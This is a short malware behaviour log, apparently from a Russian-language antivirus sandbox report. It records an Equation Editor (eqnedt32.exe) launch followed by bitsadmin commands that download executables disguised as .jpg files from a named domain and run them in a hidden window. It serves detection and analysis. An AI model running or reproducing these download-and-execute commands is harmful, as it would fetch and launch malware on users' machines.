Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer wc /priority foreground https://multi-trexintegfoodsplc.com/csi/ozi.jpg %USERPROFILE%\mt.exe && start %USERPROFILE%\mt.exe & bitsadmin /transfer sW /priority foreground h...
- 'mu######exintegfoodsplc.com':443
- DNS ASK mu######exintegfoodsplc.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer wc /priority foreground https://multi-trexintegfoodsplc.com/csi/ozi.jpg %USERPROFILE%\mt.exe && start %USERPROFILE%\mt.exe & bitsadmin /transfer sW /priority foreground h...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer wc /priority foreground https://multi-trexintegfoodsplc.com/csi/ozi.jpg %HOMEPATH%\mt.exe
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer sW /priority foreground https://multi-trexintegfoodsplc.com/csi/ize.jpg %HOMEPATH%\qww.exe
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer eR /priority foreground https://multi-trexintegfoodsplc.com/csi/oza.jpg %HOMEPATH%\a.exe